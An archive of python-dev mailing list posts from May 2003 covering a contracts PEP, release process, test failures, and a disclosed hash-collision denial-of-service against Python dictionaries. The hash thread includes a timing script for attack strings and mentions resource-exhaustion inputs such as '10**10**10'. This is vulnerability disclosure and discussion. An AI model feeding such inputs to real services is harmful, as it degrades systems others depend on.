* Documentation aid.
* Debugging tool.
* Support for software fault tolerance.

[...]

The second use is essential in the production of reusable software
elements and, more generally, in organizing the interfaces of
modules in large software systems.  Preconditions, postconditions,
and class invariants provide potential clients of a module with
crucial information about the services offered by the module, expressed
in a concise and precise form.  No amount of verbose documentation can
replace a set of carefully expressed assertions.
"""

I really like Extreme Programming's cut-to-the-bone approach: there
are only two things worth knowing about the code: *what* it does and
*how* it does it.  In XP, what the code does can be inferred from
test cases; how it does it from the source code.  And if you can't
read the code, you have no business talking about how the software
does what it does anyway.

With contracts, I want to move the knowledge of *what* the code does
from the test cases back into the programming documentation.  It
is merely a bonus feature that this documentation can be executed.

When I was learning Python (um, not too long ago) the epiphany of
what this language was all about hit me when I saw the 'doctest'
module.  We're *always* using examples as clear, concise ways to
describe what our code does, but we're all guilty of letting those
examples get out-of-date.  Doctest can crawl into our software
deep enough to keep us honest about our documentation.  Contracts
extend this so it's not just about the basic sample cases, but
about the entire state space that a function supports... "Here be
dragons" but over there be heap-based priority queues.

>> self.note(): where *is* the documentation on how to enable the
>> behavior.
>
> I suspect we have to know this before we can know which way is easier.
>
Now that I've come out as a doctest fanboy, it should be no surprise
that contracts are enabled like this:
     import contracts, mymodule
     contracts.checkmod(mymodule)

The checkmod side effect is that all functions within mymodule are
replaced by auto-generated checking functions.

And now I think I'm clear in my own mind about backwards-
compatibility with informal 'pre:' docstrings... a programmer
doesn't run checkmod unless she's sure that all docstring
contracts are valid.  Syntax error exceptions will be passed
through to the checkmod caller.

Cheers!



From terry@wayforward.net  Thu May 29 19:26:36 2003
From: terry@wayforward.net (Terence Way)
Date: Thu, 29 May 2003 14:26:36 -0400
Subject: [Python-Dev] Contracts PEP (was re: Introduction)
In-Reply-To: <5.1.1.6.0.20030528174512.01eb5e50@telecommunity.com>
Message-ID: <151E799C-9203-11D7-BD8E-00039344A0EC@wayforward.net>

On Wednesday, May 28, 2003, at 06:05  PM, Phillip J. Eby wrote:

> ... I'm still totally not seeing why Alice and Bob have to use the 
> same mechanism.  Alice could use method wrappers, Bob could use a 
> metaclass, and Carol could use assert statements, as far as I can see, 
> unless you are looking for static correctness checking.  (In which 
> case, docstrings are the wrong place for this.)

Here is the full behavior (all quotes are straight from Bertrand
Meyer's Object Oriented Software Construction, 11.1 Inheritance and
Assertions):

"""
Parents' invariant rule: The invariants of all the parents of a class
apply to the class itself.

The parents' invariants are considered to be added to the class's own
invariant, "addition" being here a logical *and*.
"""

Having a single contract implementation means that Bob's overriding
class can check Alice's invariants, even if none of Alice's methods
are actually called.

"""
Assertion redefinition rule: Let r be a routine in class A and s a
redefinition of r in a descendant of A, or an effective definition of
r if r was deferred.  Then pre(s) must be weaker than or equal to
pre(r), and post(s) must be stronger than or equal to post(r)
"""

Having a single contract implementation means that Bob's overriding
methods' postconditions check Alice's postconditions, even if none of
Alice's methods are actually called.

I hope I've at least convinced you that it would be nice to have a
single implementation to support 'inv:' and 'post:' with inheritance.

Now on to those irritating pre-conditions.

> That, to me, is weakening a precondition.  Now, if what you're saying 
> is that Bob's code must work if *Alice's* preconditions are met, then 
> that's something different.  What you're saying then, is that it's 
> required that a precondition in a subclass be logically implied by 
> each of the corresponding preconditions in the base classes.
>
> That is certainly a reasonable requirement, but I don't see why the 
> language needs to enforce it, certainly not by running Bob's code even 
> when Bob's precondition fails!  If you're going to enforce it, it 
> should be enforced by issuing an error for preconditions that aren't 
> logically implied by their superclass preconditions.  Then you 
> actually get some benefit from the static checking.  If you just run 
> Bob's code, he has no way to notice that he's violating Alice's 
> contract, until his code keeps breaking at runtime.  (And then, he 
> will almost certainly come to the conclusion that the contract checker 
> is broken!)

This is especially irritating because what you're asking for is
exactly what my implementation was doing three weeks ago.  I *agree*
with you.  There seem to be two opposing groups:
Academics: Pre-conditions are ORed!  Liskov Substitution Principle!
Programmers: this is a debugging tool!  Tell me when I mess up!

I admit, I'm doing something different by supporting OR pre-
conditions.  Meyer again:
"""
So the require and ensure clause must always be given for a routine,
even if it is a redefinition, and even if these clauses are identical
to their antecedents in the original.
"""

Well, this is error-prone and wrong for postconditions.  It's not an
issue to just AND a method's post()s with all overridden post()s,
we've covered that earlier.  It's only those pesky preconditions.

Summary:
I agree with your point... pre-conditions should only be checked on a
method call for the pre-conditions of the method itself.  Overridden
method's preconditions are ignored.

However, this still means some communication between super-class and
overridden class is necessary.  Contract invariants and postconditions
conditions of overridden classes/methods still need to be checked.

Cheers!



From fdrake@acm.org  Thu May 29 19:46:12 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 29 May 2003 14:46:12 -0400
Subject: [Python-Dev] Python 2.2.3 docs freeze
Message-ID: <16086.21876.190793.365508@grendel.zope.com>

I'm going to generate the Python 2.2.3 documentation packages now, so
please no more checkins in the Doc/ tree on the release22-maint
branch.

Thanks!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From jack@performancedrivers.com  Thu May 29 20:14:21 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Thu, 29 May 2003 15:14:21 -0400
Subject: [Python-Dev] Release question
Message-ID: <20030529151421.G1276@localhost.localdomain>

The PEPs are pretty thorough about how to announce and build
releases.  My question is about cvs, branching, and feature freezes.
I joined python-dev after the 2.2 release so I haven't been around
for a 'round number' release yet.

I'm guessing 2.3 is in bugfix only mode.  When is 2.4 tagged, and what
is the timeframe on that? (the linux kernel generally waits a while
before starting the next dev branch).  Assume I asked intelligent questions
about related things and please answer them too *wink*.

Thanks,

-jack


From scrosby@cs.rice.edu  Thu May 29 21:33:12 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 15:33:12 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
Message-ID: <oydptm1biif.fsf@bert.cs.rice.edu>

Hello. We have analyzed this software to determine its vulnerability
to a new class of DoS attacks that related to a recent paper. ''Denial
of Service via Algorithmic Complexity Attacks.''

This paper discusses a new class of denial of service attacks that
work by exploiting the difference between average case performance and
worst-case performance. In an adversarial environment, the data
structures used by an application may be forced to experience their
worst case performance. For instance, hash tables are usually thought
of as being constant time operations, but with large numbers of
collisions will degrade to a linked list and may lead to a 100-10,000
times performance degradation. Because of the widespread use of hash
tables, the potential for attack is extremely widespread. Fortunately,
in many cases, other limits on the system limit the impact of these
attacks.

To be attackable, an application must have a deterministic or
predictable hash function and accept untrusted input. In general, for
the attack to be signifigant, the applications must be willing and
able to accept hundreds to tens of thousands of 'attack
inputs'. Because of that requirement, it is difficult to judge the
impact of these attack without knowing the source code extremely well,
and knowing all ways in which a program is used.

As part of this project, I have examined python 2.3b1, and the hash
function 'string_hash' is deterministic. Thus any script that may hash
untrusted input may vulnerable to our attack. Furthermore, the
structure of the hash functions allows our fast collision generation
algorithm to work. This means that any script written in python that
hashes a large number of keys from an untrusted source is potentially
subject to a severe performance degradation.

Depending on the application or script, this could be a critical DoS.


The solution for these attacks on hash tables is to make the hash
function unpredictable via a technique known as universal
hashing. Universal hashing is a keyed hash function where, based on
the key, one of a large set hash functions is chosen. When
benchmarking, we observe that for short or medium length inputs, it is
comparable in performance to simple predictable hash functions such as
the ones in Python or Perl. Our paper has graphs and charts of our
benchmarked performance.

I highly advise using a universal hashing library, either our own or
someone elses. As is historically seen, it is very easy to make silly
mistakes when attempting to implement your own 'secure' algorithm.

The abstract, paper, and a library implementing universal hashing is
available at   http://www.cs.rice.edu/~scrosby/hash/.

Scott


From python@rcn.com  Thu May 29 21:55:35 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 29 May 2003 16:55:35 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
References: <oydptm1biif.fsf@bert.cs.rice.edu>
Message-ID: <006f01c32624$a8c0ed80$125ffea9@oemcomputer>

>For instance, hash tables are usually thought
> of as being constant time operations, but with large numbers of
> collisions will degrade to a linked list and may lead to a 100-10,000
> times performance degradation. 

True enough.  And it's not hard to create tons of keys that will collide
(Uncle Tim even gives an example in the source for those who care
to read).  Going from O(1) to O(n) for each insertion would be a bit 
painful during the process of building up a large dictionary.

So, did your research show a prevalence of or even existence of 
online applications that allow someone to submit high volumes of
meaningless keys to be saved in a hash table?


Raymond Hettinger


From jeremy@zope.com  Thu May 29 22:01:19 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 29 May 2003 17:01:19 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydptm1biif.fsf@bert.cs.rice.edu>
References: <oydptm1biif.fsf@bert.cs.rice.edu>
Message-ID: <1054242079.6832.26.camel@slothrop.zope.com>

Scott,

I just too a minute too look at this.  I downloaded the python-attack
file from your Web site.  I loading all the strings and then inserted
them into a dictionary.  I also generated a list of 10,000 random
strings and inserted them into a dictionary.

The script is below.

The results show that inserting the python-attack strings is about 4
times slower than inserting random strings.

slothrop:~/src/python/dist/src/build> ./python ~/attack.py
~/python-attack 
time 0.0898009538651
size 10000
slothrop:~/src/python/dist/src/build> ./python ~/attack.py
~/simple        
time 0.0229719877243
size 10000

Jeremy

import time

def main(path):
    L = [l.strip() for l in open(path)]

    d = {}
    t0 = time.time()
    for k in L:
        d[k] = 1
    t1 = time.time()
    print "time", t1 - t0
    print "size", len(d)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])




From scrosby@cs.rice.edu  Thu May 29 22:10:04 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 16:10:04 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <1054242079.6832.26.camel@slothrop.zope.com>
References: <oydptm1biif.fsf@bert.cs.rice.edu>
 <1054242079.6832.26.camel@slothrop.zope.com>
Message-ID: <oyd1xyhbgsz.fsf@bert.cs.rice.edu>

On 29 May 2003 17:01:19 -0400, Jeremy Hylton <jeremy@zope.com> writes:

> Scott,
> 
> I just too a minute too look at this.  I downloaded the python-attack
> file from your Web site.  I loading all the strings and then inserted
> them into a dictionary.  I also generated a list of 10,000 random
> strings and inserted them into a dictionary.

Ok. It should have taken almost a minute instead of .08 seconds in the
attack version.  My file is broken. I'll be constructing a new one
later this evening.  If you test perl with the perl files, you'll see
what should have occured in this case.

> The script is below.

Thank you.

Scott


From scrosby@cs.rice.edu  Thu May 29 22:23:24 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 16:23:24 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <006f01c32624$a8c0ed80$125ffea9@oemcomputer>
References: <oydptm1biif.fsf@bert.cs.rice.edu>
 <006f01c32624$a8c0ed80$125ffea9@oemcomputer>
Message-ID: <oydsmqxa1mb.fsf@bert.cs.rice.edu>

On Thu, 29 May 2003 16:55:35 -0400, "Raymond Hettinger" <python@rcn.com> writes:
> So, did your research show a prevalence of or even existence of 
> online applications that allow someone to submit high volumes of
> meaningless keys to be saved in a hash table?

I am not a python guru and We weren't looking for specific
applications, so I wouldn't know.

Scott


From gward@python.net  Thu May 29 22:56:52 2003
From: gward@python.net (Greg Ward)
Date: Thu, 29 May 2003 17:56:52 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: <200305291450.h4TEo6q15846@odiug.zope.com>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net> <20030529013229.GA19091@cthulhu.gerg.ca> <200305291450.h4TEo6q15846@odiug.zope.com>
Message-ID: <20030529215652.GB28065@cthulhu.gerg.ca>

On 29 May 2003, Guido van Rossum said:
> Did you check in the changes to ossaudiodev?

Oops!  I did now -- thanks.  Please try again.

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
I just read that 50% of the population has below median IQ!


From guido@python.org  Thu May 29 23:29:39 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 29 May 2003 18:29:39 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: Your message of "Thu, 29 May 2003 17:56:52 EDT."
 <20030529215652.GB28065@cthulhu.gerg.ca>
References: <20030526021635.GA15814@cthulhu.gerg.ca> <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net> <20030529013229.GA19091@cthulhu.gerg.ca> <200305291450.h4TEo6q15846@odiug.zope.com>
 <20030529215652.GB28065@cthulhu.gerg.ca>
Message-ID: <200305292229.h4TMTdU19567@odiug.zope.com>

> > Did you check in the changes to ossaudiodev?
> 
> Oops!  I did now -- thanks.  Please try again.

Alas, no change.  Still some squeaks from the speaker followed by a
hanging process:

Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 974, in ?
    main()
  File "../Lib/test/regrtest.py", line 264, in main
    ok = runtest(test, generate, verbose, quiet, testdir)
  File "../Lib/test/regrtest.py", line 394, in runtest
    the_package = __import__(abstest, globals(), locals(), [])
  File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 119, in ?
    test()
  File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 116, in test
    play_sound_file(data, rate, ssize, nchannels)
  File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 58, in play_sound_file
    dsp.write(data)
KeyboardInterrupt

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim@zope.com  Thu May 29 23:31:56 2003
From: tim@zope.com (Tim Peters)
Date: Thu, 29 May 2003 18:31:56 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oyd1xyhbgsz.fsf@bert.cs.rice.edu>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEIAFMAA.tim@zope.com>

[Jeremy Hylton]
>> I just too a minute too look at this.  I downloaded the python-attack
>> file from your Web site.  I loading all the strings and then inserted
>> them into a dictionary.  I also generated a list of 10,000 random
>> strings and inserted them into a dictionary.

[Scott Crosby]
> Ok. It should have taken almost a minute instead of .08 seconds in the
> attack version.  My file is broken. I'll be constructing a new one
> later this evening.  If you test perl with the perl files, you'll see
> what should have occured in this case.

Note that the 10,000 strings in the file map to 400 distinct 32-bit hash
codes under Python's hash.  It's not enough to provoke worst-case behavior
in Python just to collide on the low-order bits:  all 32 bits contribute to
the probe sequence (just colliding on the initial bucket slot doesn't have
much effect).  As is, it's effectively creating 400 collision chains,
ranging in length from 7 to 252, with a mean length of 25 and a median of
16.



From scrosby@cs.rice.edu  Fri May 30 00:29:45 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 18:29:45 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEIAFMAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHIEIAFMAA.tim@zope.com>
Message-ID: <oydel2hbac6.fsf@bert.cs.rice.edu>

On Thu, 29 May 2003 18:31:56 -0400, "Tim Peters" <tim@zope.com> writes:

> [Jeremy Hylton]
> >> I just too a minute too look at this.  I downloaded the python-attack
> >> file from your Web site.  I loading all the strings and then inserted
> >> them into a dictionary.  I also generated a list of 10,000 random
> >> strings and inserted them into a dictionary.
> 
> [Scott Crosby]
> > Ok. It should have taken almost a minute instead of .08 seconds in the
> > attack version.  My file is broken. I'll be constructing a new one
> > later this evening.  If you test perl with the perl files, you'll see
> > what should have occured in this case.
> 
> Note that the 10,000 strings in the file map to 400 distinct 32-bit hash
> codes under Python's hash.  It's not enough to provoke worst-case behavior

Yes. Jeremey has made me aware of this. I appear to have made a
mistake when inserting python's hash code into my program that finds
generators. The fact that I find so many collisions, but I don't have
everything colliding indicates what the problem is.

> in Python just to collide on the low-order bits:  all 32 bits contribute to
> the probe sequence (just colliding on the initial bucket slot doesn't have
> much effect).

Correct. My program, as per the paper, generates full 32 bit hash
collisions. It doesn't generate bucket collisions.

> As is, it's effectively creating 400 collision chains, ranging in
> length from 7 to 252, with a mean length of 25 and a median of 16.

Yes. I don't know python so I had no test program to verify that my
attack file was correct. Its not. Now that I have one, I'll quash the
bug and release a new file later this evening.

Scott


From tim.one@comcast.net  Fri May 30 02:54:20 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 29 May 2003 21:54:20 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydptm1biif.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>

I've got one meta-comment here:

[Scott A Crosby]
> Hello. We have analyzed this software to determine its vulnerability
> to a new class of DoS attacks that related to a recent paper. ''Denial
> of Service via Algorithmic Complexity Attacks.''

I don't think this is new.  For example, a much simpler kind of attack is to
exploit the way backtracking regexp engines work -- it's easy to find regexp
+ target_string combos that take time exponential in the sum of the lengths
of the input strings.  It's not so easy to recognize such a pair when it's
handed to you.  In Python, exploiting unbounded-int arithmetic is another
way to soak up eons of CPU with few characters, e.g.

    10**10**10

will suck up all your CPU *and* all your RAM.  Another easy way is to study
a system's C qsort() implementation, and provoke it into quadratic-time
behavior (BTW, McIlroy wrote a cool paper on this in '98:

    http://www.cs.dartmouth.edu/~doug/mdmspe.pdf
).


I'm uninterested in trying to "do something" about these.  If
resource-hogging is a serious potential problem in some context, then
resource limitation is an operating system's job, and any use of Python (or
Perl, etc) in such a context should be under the watchful eyes of OS
subsystems that track actual resource usage.



From scrosby@cs.rice.edu  Fri May 30 03:19:57 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 21:19:57 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
Message-ID: <oydisrtyy42.fsf@bert.cs.rice.edu>

On Thu, 29 May 2003 21:54:20 -0400, Tim Peters <tim.one@comcast.net> writes:

> I've got one meta-comment here:
> 
> [Scott A Crosby]
> > Hello. We have analyzed this software to determine its vulnerability
> > to a new class of DoS attacks that related to a recent paper. ''Denial
> > of Service via Algorithmic Complexity Attacks.''
> 
> I don't think this is new.  For example, a much simpler kind of attack is to
> exploit the way backtracking regexp engines work -- it's easy to find regexp
> + target_string combos that take time exponential in the sum of the lengths
> of the input strings.  It's not so easy to recognize such a pair when it's
> handed to you.  In Python, exploiting unbounded-int arithmetic is another
> way to soak up eons of CPU with few characters, e.g.
> 
>     10**10**10
> 

These ways require me having the ability to feed a program, an
expression, or a regular expression into the victim's python
interpreter.

The attack I discuss only require that it hash some arbitrary input by
the attacker, so these attacks apply in many more cases.

> will suck up all your CPU *and* all your RAM.  Another easy way is to study
> a system's C qsort() implementation, and provoke it into quadratic-time
> behavior (BTW, McIlroy wrote a cool paper on this in '98:
> 
>     http://www.cs.dartmouth.edu/~doug/mdmspe.pdf

This is a very cool paper in exactly the same vein as ours. Thanks.

> I'm uninterested in trying to "do something" about these.  If
> resource-hogging is a serious potential problem in some context, then
> resource limitation is an operating system's job, and any use of Python (or
> Perl, etc) in such a context should be under the watchful eyes of OS
> subsystems that track actual resource usage.

I disagree. Changing the hash function eliminates these attacks on
hash tables.

Scott



From tim_one@email.msn.com  Fri May 30 04:00:35 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 29 May 2003 23:00:35 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydisrtyy42.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHBELAB.tim_one@email.msn.com>

[Scott A Crosby]
> These ways require me having the ability to feed a program, an
> expression, or a regular expression into the victim's python
> interpreter.

I think you underestimate the perversity of regular expressions in
particular.  Many programs use (fixed) regexps to parse input, and it's
often possible to construct inputs that take horribly long times to match,
or, especially, to fail to match.  Blowing the hardware stack (provoking a
memory fault) is also usually easy.  The art of writing robust regexps for
use with a backtracking engine is obscure and difficult (see Friedl's
"Mastering Regular Expressions" (O'Reilly) for a practical intro to the
topic), and regexps are ubiquitous now.

> The attack I discuss only require that it hash some arbitrary input by
> the attacker, so these attacks apply in many more cases.

While a regexp attack only requires that the program parse one user-supplied
string <wink>

>>     http://www.cs.dartmouth.edu/~doug/mdmspe.pdf

> This is a very cool paper in exactly the same vein as ours. Thanks.

It is a cool paper, and you're welcome.  I don't think it's in the same
vein, though -- McIlroy presented it as an interesting discovery, not as "a
reason" for people to get agitated about programs using quicksort.  The most
likely reason you didn't find references to it before is because nobody in
real life cares much about this attack possibility.

>> I'm uninterested in trying to "do something" about these.  If
>> resource-hogging is a serious potential problem in some context, then
>> resource limitation is an operating system's job, and any use of
>> Python (or Perl, etc) in such a context should be under the watchful
>> eyes of OS subsystems that track actual resource usage.

> I disagree. Changing the hash function eliminates these attacks on
> hash tables.

It depends on how much access an attacker has, and, as you said before,
you're not aware of any specific application in Python that *can* be
attacked this way.  I'm not either.

In any case, the universe of resource attacks is much larger than just
picking on hash functions, so plugging a hole in those alone wouldn't do
anything to ease my fears -- provided I had such fears, which is admittedly
a stretch <wink>.  If I did have such fears, I'd want the OS to alleviate
them all at once.



From martin@v.loewis.de  Fri May 30 07:37:00 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 30 May 2003 08:37:00 +0200
Subject: [Python-Dev] Release question
In-Reply-To: <20030529151421.G1276@localhost.localdomain>
References: <20030529151421.G1276@localhost.localdomain>
Message-ID: <m365ntvt2r.fsf@mira.informatik.hu-berlin.de>

Jack Diederich <jack@performancedrivers.com> writes:

> The PEPs are pretty thorough about how to announce and build
> releases.  My question is about cvs, branching, and feature freezes.
> I joined python-dev after the 2.2 release so I haven't been around
> for a 'round number' release yet.

Notice that PEP 101 *does* talk about CVS branches and tags, for
releases. Branches are not used much for anything else in Python.

> I'm guessing 2.3 is in bugfix only mode.  

Correct; there will be one more beta, release candidates, and a
release.

> When is 2.4 tagged, and what is the timeframe on that? (the linux
> kernel generally waits a while before starting the next dev branch).

This is not how Python works. Immediately after 2.3 is released, 2.4
development starts. Bugs discovered in 2.3 are then fixed both on the
2.3-maint branch and HEAD (if there are any volunteers from the PBF,
those patches may also get applied to the 2.2-maint branch if
applicable).

In Linux, a new "unstable" kernel is usually started with a major
restructuring of everything, so the "unstable" code base diverges
quickly from the previous release. This is not the case for Python -
we still have a lot of code that was in 1.5.

Regards,
Martin


From guido@python.org  Fri May 30 12:39:18 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 30 May 2003 07:39:18 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: "Your message of 29 May 2003 21:19:57 CDT."
 <oydisrtyy42.fsf@bert.cs.rice.edu>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
Message-ID: <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>

[Tim Peters]
> > I'm uninterested in trying to "do something" about these.  If
> > resource-hogging is a serious potential problem in some context, then
> > resource limitation is an operating system's job, and any use of Python (or
> > Perl, etc) in such a context should be under the watchful eyes of OS
> > subsystems that track actual resource usage.

[Scott Crosby]
> I disagree. Changing the hash function eliminates these attacks on
> hash tables.

At what cost for Python?  99.99% of all Python programs are not
vulnerable to this kind of attack, because they don't take huge
amounts of arbitrary input from an untrusted source.  If the hash
function you propose is even a *teensy* bit slower than the one we've
got now (and from your description I'm sure it has to be), everybody
would be paying for the solution to a problem they don't have.  You
keep insisting that you don't know Python.  Hashing is used an awful
lot in Python -- as an interpreted language, most variable lookups and
all method and instance variable lookups use hashing.  So this would
affect every Python program.

Scott, we thank you for pointing out the issue, but I think you'll be
wearing out your welcome here quickly if you keep insisting that we do
things your way based on the evidence you've produced so far.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From scrosby@cs.rice.edu  Fri May 30 17:18:14 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 30 May 2003 11:18:14 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <oyd4r3cl86x.fsf@bert.cs.rice.edu>

On Fri, 30 May 2003 07:39:18 -0400, Guido van Rossum <guido@python.org> writes:

> [Tim Peters]
> > > I'm uninterested in trying to "do something" about these.  If
> > > resource-hogging is a serious potential problem in some context, then
> > > resource limitation is an operating system's job, and any use of Python (or
> > > Perl, etc) in such a context should be under the watchful eyes of OS
> > > subsystems that track actual resource usage.
> 
> [Scott Crosby]
> > I disagree. Changing the hash function eliminates these attacks on
> > hash tables.
> 
> At what cost for Python?  99.99% of all Python programs are not
> vulnerable to this kind of attack, because they don't take huge
> amounts of arbitrary input from an untrusted source.  If the hash
> function you propose is even a *teensy* bit slower than the one we've
> got now (and from your description I'm sure it has to be), everybody

We included several benchmarks in our paper:

On here, 
   http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/CacheEffects2.png

when we compare hash functions as the working set changes, we notice
that a single L2 cache miss far exceeds hashing time for all
algorithms.

On 

   http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/LengthEffects.png

UHASH exceeds the performance of perl's hash function, which is
simpler than your own.

Even for small strings, UHASH is only about half the speed of perl's
hash function, and your function already performs a multiplication per
byte:

#define HASH(hi,ho,c)    ho = (1000003*hi) ^ c
#define HASH0(ho,c)      ho = ((c << 7)*1000003) ^ c

The difference between this and CW12 is one 32 bit modulo
operation. (Please note that CW12 is currently broken. Fortunately it
didn't affect the benchmarking on x86.)

> would be paying for the solution to a problem they don't have.  You
> keep insisting that you don't know Python.  Hashing is used an awful
> lot in Python -- as an interpreted language, most variable lookups and
> all method and instance variable lookups use hashing.  So this would
> affect every Python program.

Have you done benchmarking to prove that string_hash is in fact an
important hotspot in the python interpreter? If so, and doing one
modulo operation per string is unacceptable, then you may wish to
consider Jenkin's hash. The linux kernel people are switching to using
a keyed veriant of Jenkin's hash. However, Jenkin's, AFAIK, has no
proofs that it is in fact universal. It, however, probably is safe.

It is not unlikely that if you went that route you'd be somewhat
safer, and faster, but if you want full safety, you'd need to go with
a universal hash.

Scott


From jepler@unpythonic.net  Fri May 30 21:00:21 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Fri, 30 May 2003 15:00:21 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oyd4r3cl86x.fsf@bert.cs.rice.edu>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net> <oydisrtyy42.fsf@bert.cs.rice.edu> <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net> <oyd4r3cl86x.fsf@bert.cs.rice.edu>
Message-ID: <20030530200021.GB30507@unpythonic.net>

On Fri, May 30, 2003 at 11:18:14AM -0500, Scott A Crosby wrote:
> On 
> 
>    http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/LengthEffects.png
> 
> UHASH exceeds the performance of perl's hash function, which is
> simpler than your own.

I notice that you say "with strings longer than around 44-bytes,
UHASH dominates all the other hash functions, due in no small part to its
extensive performance tuning and *hand-coded assembly routines.*"
[emphasis mine]  It's all well and good for people who can run your
hand-coded VAX assembly, but when Intel's 80960* comes out and people
start running Unix on it, won't they be forced to code your hash function
all over again?  Since everybody has hopes for Python beyond the VAX
(heck, in 20 years VAX might have as little as 5% of the market --
anything could happen) there has been a consious decision not to hand-code
anything in assembly in Python.

Jeff
* The Intel 80960, in case you haven't heard of it, is a superscalar
  processor that will require highly-tuned compilers and will run like
  a bat out of hell when the code is tuned right.  I think it's capable
  of one floating-point and two integer instructions per cycle!


From guido@python.org  Fri May 30 21:35:53 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 30 May 2003 16:35:53 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
Message-ID: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>

I received this problem report (Kurt is the IDLEFORK developer).  Does
anybody know what could be the matter here?  What changed recently???

--Guido van Rossum (home page: http://www.python.org/~guido/)

------- Forwarded Message

Date:    Fri, 30 May 2003 15:50:15 -0400
From:    kbk@shore.net (Kurt B. Kaiser)
To:      Guido van Rossum <guido@python.org>
Subject: KeyboardInterrupt

I find that

       while 1: pass

doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
WinXP or W2K.  Is this generally known?  I couldn't find any mention 
of it.

      while 1: a = 0 

is fine on 2.3b1, and both work on Python2.2.

- --
KBK

------- End of Forwarded Message



From tim@zope.com  Fri May 30 21:41:03 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 30 May 2003 16:41:03 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEMJFMAA.tim@zope.com>

[Guido]
> I received this problem report (Kurt is the IDLEFORK developer).  Does
> anybody know what could be the matter here?  What changed recently???

Looks like eval-loop optimizations.  The first version essentially compiles
to a JUMP_ABSOLUTE to itself

        >>   10 JUMP_ABSOLUTE           10

and

		case JUMP_ABSOLUTE:
			JUMPTO(oparg);
			goto fast_next_opcode;

This skips the ticker checks, so never checks for interrupts.  As usual, I
expect we can blame Raymond Hettinger's good intentions <wink>.

> ------- Forwarded Message
>
> Date:    Fri, 30 May 2003 15:50:15 -0400
> From:    kbk@shore.net (Kurt B. Kaiser)
> To:      Guido van Rossum <guido@python.org>
> Subject: KeyboardInterrupt
>
